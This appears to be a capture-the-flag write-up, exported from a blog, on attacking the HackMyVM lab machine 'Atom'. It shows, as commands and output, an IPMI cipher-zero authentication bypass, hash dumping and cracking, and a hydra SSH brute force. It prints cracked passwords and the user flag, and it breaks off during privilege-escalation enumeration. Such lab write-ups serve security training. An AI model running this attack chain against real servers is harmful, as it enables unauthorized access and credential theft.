{"id":763,"date":"2024-07-19T02:24:15","date_gmt":"2024-07-18T18:24:15","guid":{"rendered":"http:\/\/162.14.82.114\/?p=763"},"modified":"2024-07-19T02:24:15","modified_gmt":"2024-07-18T18:24:15","slug":"hmv-_-atom","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/763\/07\/19\/2024\/","title":{"rendered":"hmv[-_-]Atom"},"content":{"rendered":"<h1>Atom<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407190221981.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407190221981.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240718232244203\" style=\"zoom: 50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407190221983.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407190221983.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240718232646601\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Atom]\n\u2514\u2500$ rustscan -a $IP -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 172.20.10.3:22\n\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)\n| ssh-hostkey: \n|   256 e7:ce:f2:f6:5d:a7:47:5a:16:2f:90:07:07:33:4e:a9 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLuHH80SwA8Qff3pGOY4aBesL0Aeesw6jqX+pbtR9O7w8jlbyNhuHmjjABb\/34BxFp2oBx8o5xuZVXS1cE9nAlE=\n|   256 09:db:b7:e8:ee:d4:52:b8:49:c3:cc:29:a5:6e:07:35 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICKFE9s2IvPGAJ7Pt0kSC8t9OXYUrueJQQplSC2wbYtY\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<p>This reminded me of the new vulnerability that was disclosed not long ago, but it does not seem easy to exploit, and the people in my group chat did not manage to exploit it either, so I am setting it aside for now.<\/p>\n<h2>Vulnerability Discovery<\/h2>\n<h3>UDP Scan<\/h3>\n<p>I could not see any other way in, so I tried a UDP scan, scanning only the first ten thousand ports to save time:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Atom]\n\u2514\u2500$ sudo nmap -sU $IP -p-                 \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-07-18 11:30 EDT\nStats: 0:03:19 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan\nUDP Scan Timing: About 0.32% done\nStats: 0:05:54 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan\nUDP Scan Timing: About 0.56% done<\/code><\/pre>\n<p>The scan turned out to be far too slow... I changed the parameters to cover only the 100 most commonly used ports:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Atom]\n\u2514\u2500$ sudo nmap -sU -sV --version-intensity 0 -n -F -T4 $IP\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-07-18 11:41 
EDT\nStats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan\nUDP Scan Timing: About 32.17% done; ETC: 11:42 (0:00:21 remaining)\nNmap scan report for 172.20.10.3\nHost is up (0.00079s latency).\nNot shown: 61 open|filtered udp ports (no-response), 38 closed udp ports (port-unreach)\nPORT    STATE SERVICE  VERSION\n623\/udp open  asf-rmcp\nMAC Address: 08:00:27:35:45:0A (Oracle VirtualBox virtual NIC)\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 43.55 seconds<\/code><\/pre>\n<blockquote>\n<ul>\n<li><code>-sU<\/code>: This option tells <code>nmap<\/code> to scan only UDP ports. By default, <code>nmap<\/code> scans both TCP and UDP ports, but if you are only interested in UDP ports you can use this option.<\/li>\n<li><code>-sV<\/code>: This option makes <code>nmap<\/code> try to determine the service version information for open ports on the target machine. It does this by sending a series of probes to the port and parsing the responses.<\/li>\n<li><code>--version-intensity 0<\/code>: This option adjusts the intensity of version detection. Intensity values range from 0 to 9, where 0 means very lightweight detection (only a few basic probes are sent) and 9 means the most thorough detection (a large number of probes may be sent, but it may take more time and expose more of the scanning activity).<\/li>\n<li><code>-n<\/code>: 
This option tells <code>nmap<\/code> not to perform DNS resolution while scanning. This can speed up the scan, especially when scanning a large number of IP addresses, because DNS resolution can become a bottleneck.<\/li>\n<li><code>-F<\/code>: This option is shorthand for <code>--fast<\/code> and makes <code>nmap<\/code> scan faster. It reduces the number of ports scanned (only the 100 most common ports) and may reduce the scan time or the number of probes sent. This is useful for quickly getting basic information about the target system.<\/li>\n<li><code>-T4<\/code>: This option sets the timing template for the scan. <code>nmap<\/code> provides several timing templates (from 0 to 5), where 0 is the slowest (the stealthiest) and 5 is the fastest (but possibly easier to detect). <code>-T4<\/code> is a medium-speed setting that strikes a compromise between scan speed and stealth.<\/li>\n<\/ul>\n<\/blockquote>\n<p>Blazingly fast, nice! Now let us see what this port actually is: <a 
href=\"https:\/\/book.hacktricks.xyz\/network-services-pentesting\/623-udp-ipmi\">https:\/\/book.hacktricks.xyz\/network-services-pentesting\/623-udp-ipmi<\/a><\/p>\n<p>Try gathering information:<\/p>\n<h3>IPMI Information Gathering<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Atom]\n\u2514\u2500$ sudo nmap -sU --script ipmi-version -p 623 $IP   \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-07-18 11:48 EDT\nNmap scan report for 172.20.10.3\nHost is up (0.00084s latency).\n\nPORT    STATE SERVICE\n623\/udp open  asf-rmcp\n| ipmi-version: \n|   Version: \n|     IPMI-2.0\n|   UserAuth: password, md5, md2, null\n|   PassAuth: auth_msg, auth_user, non_null_user\n|_  Level: 1.5, 2.0\nMAC Address: 08:00:27:35:45:0A (Oracle VirtualBox virtual NIC)\n\nNmap done: 1 IP address (1 host up) scanned in 0.33 seconds<\/code><\/pre>\n<p>Scan to check whether the related authentication bypass vulnerability is present:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Atom]\n\u2514\u2500$ msfconsole -q\nmsf6 &gt; use auxiliary\/scanner\/ipmi\/ipmi_version\nmsf6 auxiliary(scanner\/ipmi\/ipmi_version) &gt; show options\n\nModule options (auxiliary\/scanner\/ipmi\/ipmi_version):\n\n   Name       Current Setting  Required  Description\n   ----       ---------------  --------  -----------\n   BATCHSIZE  256              yes       The number of hosts to probe in each set\n   RHOSTS                      yes       The target host(s), see https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/using-metasploit.html\n   RPORT      623              yes       The target port (UDP)\n   THREADS    10               yes       The number of concurrent threads\n\nView the full module info with the info, or info -d command.\n\nmsf6 auxiliary(scanner\/ipmi\/ipmi_version) &gt; set RHOSTS 172.20.10.3\nRHOSTS =&gt; 172.20.10.3\nmsf6 
auxiliary(scanner\/ipmi\/ipmi_version) &gt; run\n\n[*] Sending IPMI requests to 172.20.10.3-&gt;172.20.10.3 (1 hosts)\n[+] 172.20.10.3:623 - IPMI - IPMI-2.0 UserAuth(auth_msg, auth_user, non_null_user) PassAuth(password, md5, md2, null) Level(1.5, 2.0) \n[*] Scanned 1 of 1 hosts (100% complete)\n[*] Auxiliary module execution completed\nmsf6 auxiliary(scanner\/ipmi\/ipmi_version) &gt; use auxiliary\/scanner\/ipmi\/ipmi_cipher_zero\nmsf6 auxiliary(scanner\/ipmi\/ipmi_cipher_zero) &gt; show options\n\nModule options (auxiliary\/scanner\/ipmi\/ipmi_cipher_zero):\n\n   Name       Current Setting  Required  Description\n   ----       ---------------  --------  -----------\n   BATCHSIZE  256              yes       The number of hosts to probe in each set\n   RHOSTS                      yes       The target host(s), see https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/using-metasploit.html\n   RPORT      623              yes       The target port (UDP)\n   THREADS    10               yes       The number of concurrent threads\n\nView the full module info with the info, or info -d command.\n\nmsf6 auxiliary(scanner\/ipmi\/ipmi_cipher_zero) &gt; set rhosts 172.20.10.3\nrhosts =&gt; 172.20.10.3\nmsf6 auxiliary(scanner\/ipmi\/ipmi_cipher_zero) &gt; run\n\n[*] Sending IPMI requests to 172.20.10.3-&gt;172.20.10.3 (1 hosts)\n[+] 172.20.10.3:623 - IPMI - VULNERABLE: Accepted a session open request for cipher zero\n[*] Scanned 1 of 1 hosts (100% complete)\n[*] Auxiliary module execution completed<\/code><\/pre>\n<p>The vulnerability is present and can be exploited. Try exploiting it with a tool: <code>apt-get install ipmitool<\/code>, but a username and password have to be found first:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Atom]\n\u2514\u2500$ msfconsole -q                                   \nmsf6 &gt; use 
auxiliary\/scanner\/ipmi\/ipmi_dumphashes\nmsf6 auxiliary(scanner\/ipmi\/ipmi_dumphashes) &gt; show options\n\nModule options (auxiliary\/scanner\/ipmi\/ipmi_dumphashes):\n\n   Name                  Current Setting                                    Required  Description\n   ----                  ---------------                                    --------  -----------\n   CRACK_COMMON          true                                               yes       Automatically crack common passwords as they are obtained\n   OUTPUT_HASHCAT_FILE                                                      no        Save captured password hashes in hashcat format\n   OUTPUT_JOHN_FILE                                                         no        Save captured password hashes in john the ripper format\n   PASS_FILE             \/usr\/share\/metasploit-framework\/data\/wordlists\/ip  yes       File containing common passwords for offline cracking, one per line\n                         mi_passwords.txt\n   RHOSTS                                                                   yes       The target host(s), see https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/using-meta\n                                                                                      sploit.html\n   RPORT                 623                                                yes       The target port\n   SESSION_MAX_ATTEMPTS  5                                                  yes       Maximum number of session retries, required on certain BMCs (HP iLO 4, etc)\n   SESSION_RETRY_DELAY   5                                                  yes       Delay between session retries in seconds\n   THREADS               1                                                  yes       The number of concurrent threads (max one per host)\n   USER_FILE             \/usr\/share\/metasploit-framework\/data\/wordlists\/ip  yes       File containing usernames, one per line\n                         mi_users.txt\n\nView the 
full module info with the info, or info -d command.\n\nmsf6 auxiliary(scanner\/ipmi\/ipmi_dumphashes) &gt; set rhosts 172.20.10.3\nrhosts =&gt; 172.20.10.3\nmsf6 auxiliary(scanner\/ipmi\/ipmi_dumphashes) &gt; run\n\n[+] 172.20.10.3:623 - IPMI - Hash found: admin:a111f95082010000092609dfb9d7bddaf155a7ca936647a94a430a7cc46c896ed9721d01c8b36230a123456789abcdefa123456789abcdef140561646d696e:f086884e16c2ea6ffc95d9163d380fc94ead10c0\n[+] 172.20.10.3:623 - IPMI - Hash for user &#039;admin&#039; matches password &#039;cukorborso&#039;\n[*] Scanned 1 of 1 hosts (100% complete)\n[*] Auxiliary module execution completed<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407190221984.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407190221984.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240719001248673\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>But no passwords for the other users turned up... <code>Posting the image because it looks nice and has colors.jpg<\/code>. Try bypassing IPMI authentication:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Atom]\n\u2514\u2500$ ipmitool -I lanplus -C 0 -H 172.20.10.3 -U admin -P cukorborso user list\nID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit\n1                    true    false      false      Unknown (0x00)\n2   admin            
true    false      true       ADMINISTRATOR\n3   analiese         true    false      true       USER\n4   briella          true    false      true       USER\n5   richardson       true    false      true       USER\n6   carsten          true    false      true       USER\n7   sibylle          true    false      true       USER\n8   wai-ching        true    false      true       USER\n9   jerrilee         true    false      true       USER\n10  glynn            true    false      true       USER\n11  asia             true    false      true       USER\n12  zaylen           true    false      true       USER\n13  fabien           true    false      true       USER\n14  merola           true    false      true       USER\n15  jem              true    false      true       USER\n16  riyaz            true    false      true       USER\n17  laten            true    false      true       USER\n18  cati             true    false      true       USER\n19  rozalia          true    false      true       USER\n20  palmer           true    false      true       USER\n21  onida            true    false      true       USER\n22  terra            true    false      true       USER\n23  ranga            true    false      true       USER\n24  harrie           true    false      true       USER\n25  pauly            true    false      true       USER\n26  els              true    false      true       USER\n27  bqb              true    false      true       USER\n28  karlotte         true    false      true       USER\n29  zali             true    false      true       USER\n30  ende             true    false      true       USER\n31  stacey           true    false      true       USER\n32  shirin           true    false      true       USER\n33  kaki             true    false      true       USER\n34  saman            true    false      true       USER\n35  kalie            true    false      true       USER\n36  deshawn          true    false      true       USER\n37  mayeul       
    true    false      true       USER\n38                   true    false      false      Unknown (0x00)\n39                   true    false      false      Unknown (0x00)\n40                   true    false      false      Unknown (0x00)\n41                   true    false      false      Unknown (0x00)\n42                   true    false      false      Unknown (0x00)\n43                   true    false      false      Unknown (0x00)\n44                   true    false      false      Unknown (0x00)\n45                   true    false      false      Unknown (0x00)\n46                   true    false      false      Unknown (0x00)\n47                   true    false      false      Unknown (0x00)\n48                   true    false      false      Unknown (0x00)\n49                   true    false      false      Unknown (0x00)\n50                   true    false      false      Unknown (0x00)\n51                   true    false      false      Unknown (0x00)\n52                   true    false      false      Unknown (0x00)\n53                   true    false      false      Unknown (0x00)\n54                   true    false      false      Unknown (0x00)\n55                   true    false      false      Unknown (0x00)\n56                   true    false      false      Unknown (0x00)\n57                   true    false      false      Unknown (0x00)\n58                   true    false      false      Unknown (0x00)\n59                   true    false      false      Unknown (0x00)\n60                   true    false      false      Unknown (0x00)\n61                   true    false      false      Unknown (0x00)\n62                   true    false      false      Unknown (0x00)\n63                   true    false      false      Unknown (0x00)<\/code><\/pre>\n<h3>Finding and Exploiting Vulnerabilities<\/h3>\n<p>An SSH connection attempt failed, so try exploiting existing vulnerabilities:<\/p>\n<p><div class='fancybox-wrapper 
lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407190221985.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407190221985.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240719003457512\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>None of them worked, maybe because I was using them the wrong way. After some searching I found a new search tool:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407190221986.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407190221986.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240719004936867\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>This one also dumps hashes, so give it a try:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Atom]\n\u2514\u2500$ ipmitool -I lanplus -C 0 -H 172.20.10.3 -U admin -P 
cukorborso user list | grep USER | awk -F &#039;[ ]&#039; &#039;{print $3}&#039; | uniq -u \nglynn\nasia\nzaylen\nfabien\nmerola\njem\nriyaz\nlaten\ncati\nrozalia\npalmer\nonida\nterra\nranga\nharrie\npauly\nels\nbqb\nkarlotte\nzali\nende\nstacey\nshirin\nkaki\nsaman\nkalie\ndeshawn\nmayeul<\/code><\/pre>\n<p>Import the file for analysis:<\/p>\n<pre><code class=\"language-bash\"># git clone https:\/\/github.com\/c0rnf13ld\/ipmiPwner.git\n# ipmitool -I lanplus -C 0 -H 172.20.10.3 -U admin -P cukorborso user list | grep USER | awk -F &#039;[ ]&#039; &#039;{print $3}&#039; | uniq -u &gt; user\n# cd ipmiPwner\n# sudo .\/requirements.sh\n# Try one user at random\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Atom\/ipmiPwner]\n\u2514\u2500$ sudo python3 ipmipwner.py --host 172.20.10.3 -u glynn -c john -pW \/usr\/share\/wordlists\/rockyou.txt -oH hash\n[*] Checking if port 623 for host 172.20.10.3 is active\n[*] The username: glynn is valid                                                  \n[*] Saving hash for user: glynn in file: &quot;hash&quot;\n[*] The hash for user: glynn\n   \\_ $rakp$a4a3a2a08209000027bf9c61b838a56a9973b3df9ebf3d62123c97e7c875a1e96c914427d59d6e4aa123456789abcdefa123456789abcdef1405676c796e6e$003cce9e8c3767318b61fc6f893afd5efd3aaded[*] Starting the hash cracking with john\n\nUsing default input encoding: UTF-8\nLoaded 1 password hash (RAKP, IPMI 2.0 RAKP (RMCP+) [HMAC-SHA1 128\/128 SSE2 4x])\nWill run 2 OpenMP threads\nPress Ctrl-C to abort, or send SIGUSR1 to john process for status\nevan             (172.20.10.3 glynn)     \n1g 0:00:00:00 DONE (2024-07-18 13:12) 2.564g\/s 168041p\/s 168041c\/s 168041C\/s dyesebel..sabrina7\nUse the &quot;--show&quot; option to display all of the cracked passwords reliably\nSession completed.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Atom\/ipmiPwner]\n\u2514\u2500$ for user in $(cat ..\/user); do sudo python3 ipmipwner.py --host 172.20.10.3 -u $user -c john 
-pW \/usr\/share\/wordlists\/rockyou.txt -oH hash &gt;&gt; pass; done\n........\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Atom\/ipmiPwner]\n\u2514\u2500$ cat pass | grep &#039;(172&#039; | awk &#039;{print $1}&#039;          \nevan\nTWEETY1\n120691\nchatroom\nmackenzie2\n081704\ndjones\ntrick1\n122987\nbatman!\nphones\njiggaman\nsexymoma\njaffa1\n071590\n515253\ndezzy\n290992\nemeralds\npoynter\ntripod\ncastillo1\nkittyboo\nnumberone\n090506\nbillandben\nmilo123\n241107\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Atom\/ipmiPwner]\n\u2514\u2500$ cat pass | grep &#039;(172&#039; | awk &#039;{print $1}&#039; &gt; ..\/pazz<\/code><\/pre>\n<h3>Brute Force<\/h3>\n<p>Try brute forcing:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Atom]\n\u2514\u2500$ hydra -L user -P pazz ssh:\/\/172.20.10.3                                                                                          \nHydra v9.5 (c) 2023 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-07-18 13:47:20\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 784 login tries (l:28\/p:28), ~49 tries per task\n[DATA] attacking ssh:\/\/172.20.10.3:22\/\n[STATUS] 304.00 tries\/min, 304 tries in 00:01h, 482 to do in 00:02h, 14 active\n[22][ssh] host: 172.20.10.3   login: onida   password: jiggaman\n[STATUS] 304.00 tries\/min, 608 tries in 00:02h, 178 to do in 00:01h, 14 active\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-07-18 
13:49:59<\/code><\/pre>\n<p>Found one user; try logging in:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407190221987.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407190221987.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240719015033216\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-bash\">onida@atom:~$ sudo -l\n-bash: sudo: command not found\nonida@atom:~$ echo $SHELL\n\/bin\/bash\nonida@atom:~$ pwd\n\/home\/onida\nonida@atom:~$ ls -la\ntotal 24\ndrwx------ 2 onida onida 4096 Dec 31  2400 .\ndrwxr-xr-x 3 root  root  4096 May 24 13:55 ..\nlrwxrwxrwx 1 root  root     9 May 24 14:16 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 onida onida  220 Dec 31  2400 .bash_logout\n-rw-r--r-- 1 onida onida 3526 Dec 31  2400 .bashrc\n-rw-r--r-- 1 onida onida  807 Dec 31  2400 .profile\n-rwx------ 1 onida onida   33 Dec 31  2400 user.txt\nonida@atom:~$ cat user.txt \nf75390001fa2fe806b4e3f1e5dadeb2b\nonida@atom:~$ find  \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/bin\/passwd\n\/usr\/bin\/su\n\/usr\/bin\/chsh\n\/usr\/bin\/chfn\n\/usr\/bin\/gpasswd\n\/usr\/bin\/umount\n\/usr\/bin\/newgrp\n\/usr\/bin\/mount\n\/usr\/sbin\/pppd\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/polkit-1\/polkit-agent-helper-1\nonida@atom:~$ \/usr\/sbin\/getcap -r \/ 
2&gt;\/dev\/null\n\/usr\/bin\/ping cap_net_raw=ep\nonida@atom:~$ cd \/opt\nonida@atom:\/opt$ ls -la\ntotal 8\ndrwxr-xr-x  2 root root 4096 Mar  9 12:26 .\ndrwxr-xr-x 18 root root 4096 May 24 14:18 ..\nonida@atom:\/opt$ cd \/\nonida@atom:\/$ ls -la\ntotal 68\ndrwxr-xr-x  18 root root  4096 May 24 14:18 .\ndrwxr-xr-x  18 root root  4096 May 24 14:18 ..\nlrwxrwxrwx   1 root root     7 Mar  9 12:26 bin -&gt; usr\/bin\ndrwxr-xr-x   3 root root  4096 May 24 14:18 boot\ndrwxr-xr-x  17 root root  3320 Jul 18 17:25 dev\ndrwxr-xr-x  86 root root  4096 Jul 18 17:25 etc\ndrwxr-xr-x   3 root root  4096 May 24 13:55 home\nlrwxrwxrwx   1 root root    30 May 24 14:18 initrd.img -&gt; boot\/initrd.img-6.1.0-21-amd64\nlrwxrwxrwx   1 root root    30 Mar  9 12:28 initrd.img.old -&gt; boot\/initrd.img-6.1.0-18-amd64\nlrwxrwxrwx   1 root root     7 Mar  9 12:26 lib -&gt; usr\/lib\nlrwxrwxrwx   1 root root     9 Mar  9 12:26 lib64 -&gt; usr\/lib64\ndrwx------   2 root root 16384 Mar  9 12:26 lost+found\ndrwxr-xr-x   3 root root  4096 Mar  9 12:26 media\ndrwxr-xr-x   2 root root  4096 Mar  9 12:26 mnt\ndrwxr-xr-x   2 root root  4096 Mar  9 12:26 opt\ndr-xr-xr-x 148 root root     0 Jul 18 17:25 proc\ndrwx------   4 root root  4096 May 27 15:43 root\ndrwxr-xr-x  21 root root   620 Jul 18 19:50 run\nlrwxrwxrwx   1 root root     8 Mar  9 12:26 sbin -&gt; usr\/sbin\ndrwxr-xr-x   2 root root  4096 Mar  9 12:26 srv\ndr-xr-xr-x  13 root root     0 Jul 18 17:25 sys\ndrwxrwxrwt  10 root root  4096 Jul 18 19:39 tmp\ndrwxr-xr-x  12 root root  4096 Mar  9 12:26 usr\ndrwxr-xr-x  12 root root  4096 May 25 22:19 var\nlrwxrwxrwx   1 root root    27 May 24 14:18 vmlinuz -&gt; boot\/vmlinuz-6.1.0-21-amd64\nlrwxrwxrwx   1 root root    27 Mar  9 12:28 vmlinuz.old -&gt; boot\/vmlinuz-6.1.0-18-amd64\nonida@atom:\/$ cd \/var\/www\nonida@atom:\/var\/www$ ls -la\ntotal 12\ndrwxr-xr-x  3 root     root     4096 May 25 22:19 .\ndrwxr-xr-x 12 root     root     4096 May 25 22:19 ..\ndrwxr-xr-x  6 www-data www-data 4096 
